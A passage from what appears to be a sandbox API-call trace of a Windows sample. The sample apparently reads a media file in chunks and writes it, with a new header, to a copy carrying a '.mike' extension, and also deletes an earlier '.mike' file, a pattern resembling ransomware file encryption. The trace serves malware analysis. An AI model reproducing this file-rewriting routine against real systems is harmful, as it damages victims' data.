Shared\\ink\\en-US\\delete.avi.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", lpFilePart=0x0) returned 0x48 [0044.814] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi.mike")) returned 1 [0044.818] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\FlickLearningWizard.exe.mui", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\FlickLearningWizard.exe.mui", lpFilePart=0x0) returned 0x54 [0044.818] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkObj.dll.mui", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkObj.dll.mui", lpFilePart=0x0) returned 0x47 [0044.818] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui", lpFilePart=0x0) returned 0x4a [0044.818] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui", lpFilePart=0x0) returned 0x55 [0044.818] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui", lpFilePart=0x0) returned 0x4f [0044.818] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui", lpFilePart=0x0) returned 0x53 [0044.819] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", lpFilePart=0x0) returned 0x41 [0044.819] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", lpFilePart=0x0) returned 0x41 [0044.819] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", nBufferLength=0x105, lpBuffer=0x2aebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", lpFilePart=0x0) returned 0x41 [0044.819] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0044.819] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0044.820] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0044.820] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", nBufferLength=0x105, lpBuffer=0x2aeb18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", lpFilePart=0x0) returned 0x41 [0044.820] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0044.820] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.820] GetFileType (hFile=0x264) returned 0x1 [0044.820] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0044.820] GetFileType (hFile=0x264) returned 0x1 [0044.821] CloseHandle (hObject=0x264) returned 1 [0044.821] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", lpFilePart=0x0) returned 0x41 [0044.821] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", lpFilePart=0x0) returned 0x41 [0044.821] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec14, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0044.821] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0044.821] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0044.821] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0044.821] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0044.852] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), fInfoLevelId=0x0, lpFileInformation=0x2247a34 | out: lpFileInformation=0x2247a34*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x250aa25, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x250aa25, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9a5aa753, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x36400)) returned 1 [0044.853] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0044.853] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", lpFilePart=0x0) returned 0x41 [0044.853] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0044.853] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), fInfoLevelId=0x0, lpFileInformation=0x2247d30 | out: lpFileInformation=0x2247d30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x250aa25, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x250aa25, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9a5aa753, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x36400)) returned 1 [0044.853] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0044.853] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", lpFilePart=0x0) returned 0x41 [0044.853] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", lpFilePart=0x0) returned 0x46 [0044.853] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0044.853] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0044.853] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0044.853] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", lpFilePart=0x0) returned 0x41 [0044.853] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", lpFilePart=0x0) returned 0x41 [0044.853] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", lpFilePart=0x0) returned 0x41 [0044.853] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", nBufferLength=0x105, lpBuffer=0x2aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", lpFilePart=0x0) returned 0x46 [0044.854] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0044.854] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0d4 | out: lpFileInformation=0x2af0d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0044.854] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0044.854] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", lpFilePart=0x0) returned 0x46 [0044.854] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.854] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.854] GetFileType (hFile=0x264) returned 0x1 [0044.854] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.854] GetFileType (hFile=0x264) returned 0x1 [0044.854] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x0 [0044.854] WriteFile (in: hFile=0x264, lpBuffer=0x2248ae0*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2248ae0*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0044.855] CloseHandle (hObject=0x264) returned 1 [0044.855] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0044.855] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), fInfoLevelId=0x0, lpFileInformation=0x2248614 | out: lpFileInformation=0x2248614*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x250aa25, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x250aa25, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9a5aa753, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x36400)) returned 1 [0044.855] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0044.855] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", lpFilePart=0x0) returned 0x41 [0044.855] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.856] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.856] GetFileType (hFile=0x264) returned 0x1 [0044.856] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.856] GetFileType (hFile=0x264) returned 0x1 [0044.856] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0044.856] ReadFile (in: hFile=0x264, lpBuffer=0x2249bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2249bf8*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.857] CloseHandle (hObject=0x264) returned 1 [0044.858] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", lpFilePart=0x0) returned 0x46 [0044.858] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.859] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.859] GetFileType (hFile=0x264) returned 0x1 [0044.859] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.859] GetFileType (hFile=0x264) returned 0x1 [0044.859] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x220 [0044.859] WriteFile (in: hFile=0x264, lpBuffer=0x2254160*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x2254160*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0044.859] CloseHandle (hObject=0x264) returned 1 [0044.860] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", lpFilePart=0x0) returned 0x41 [0044.861] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.861] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.861] GetFileType (hFile=0x264) returned 0x1 [0044.861] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.861] GetFileType (hFile=0x264) returned 0x1 [0044.861] SetFilePointer (in: hFile=0x264, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2800 [0044.861] ReadFile (in: hFile=0x264, lpBuffer=0x2256b98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2256b98*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.861] CloseHandle (hObject=0x264) returned 1 [0044.862] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", lpFilePart=0x0) returned 0x46 [0044.862] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.862] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.862] GetFileType (hFile=0x264) returned 0x1 [0044.862] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.862] GetFileType (hFile=0x264) returned 0x1 [0044.862] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2a20 [0044.862] WriteFile (in: hFile=0x264, lpBuffer=0x2261100*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x2261100*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0044.862] CloseHandle (hObject=0x264) returned 1 [0044.863] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", lpFilePart=0x0) returned 0x41 [0044.863] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.863] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.863] GetFileType (hFile=0x264) returned 0x1 [0044.863] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.863] GetFileType (hFile=0x264) returned 0x1 [0044.863] SetFilePointer (in: hFile=0x264, lDistanceToMove=20480, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x5000 [0044.864] ReadFile (in: hFile=0x264, lpBuffer=0x2263b38, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2263b38*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.864] CloseHandle (hObject=0x264) returned 1 [0044.864] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", lpFilePart=0x0) returned 0x46 [0044.864] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.864] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.864] GetFileType (hFile=0x264) returned 0x1 [0044.864] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.865] GetFileType (hFile=0x264) returned 0x1 [0044.865] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x5220 [0044.865] WriteFile (in: hFile=0x264, lpBuffer=0x226e0a0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x226e0a0*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0044.865] CloseHandle (hObject=0x264) returned 1 [0044.866] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", lpFilePart=0x0) returned 0x41 [0044.866] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.866] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.866] GetFileType (hFile=0x264) returned 0x1 [0044.866] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.866] GetFileType (hFile=0x264) returned 0x1 [0044.866] SetFilePointer (in: hFile=0x264, lDistanceToMove=30720, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x7800 [0044.866] ReadFile (in: hFile=0x264, lpBuffer=0x2270ad8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2270ad8*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.866] CloseHandle (hObject=0x264) returned 1 [0044.867] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", lpFilePart=0x0) returned 0x46 [0044.867] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.867] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.867] GetFileType (hFile=0x264) returned 0x1 [0044.867] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.867] GetFileType (hFile=0x264) returned 0x1 [0044.867] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x7a20 [0044.867] WriteFile (in: hFile=0x264, lpBuffer=0x227b040*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x227b040*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0044.868] CloseHandle (hObject=0x264) returned 1 [0044.869] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", lpFilePart=0x0) returned 0x41 [0044.869] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.869] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.869] GetFileType (hFile=0x264) returned 0x1 [0044.869] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.869] GetFileType (hFile=0x264) returned 0x1 [0044.869] SetFilePointer (in: hFile=0x264, lDistanceToMove=40960, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0xa000 [0044.869] ReadFile (in: hFile=0x264, lpBuffer=0x227da78, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x227da78*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.869] CloseHandle (hObject=0x264) returned 1 [0044.870] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", lpFilePart=0x0) returned 0x46 [0044.870] 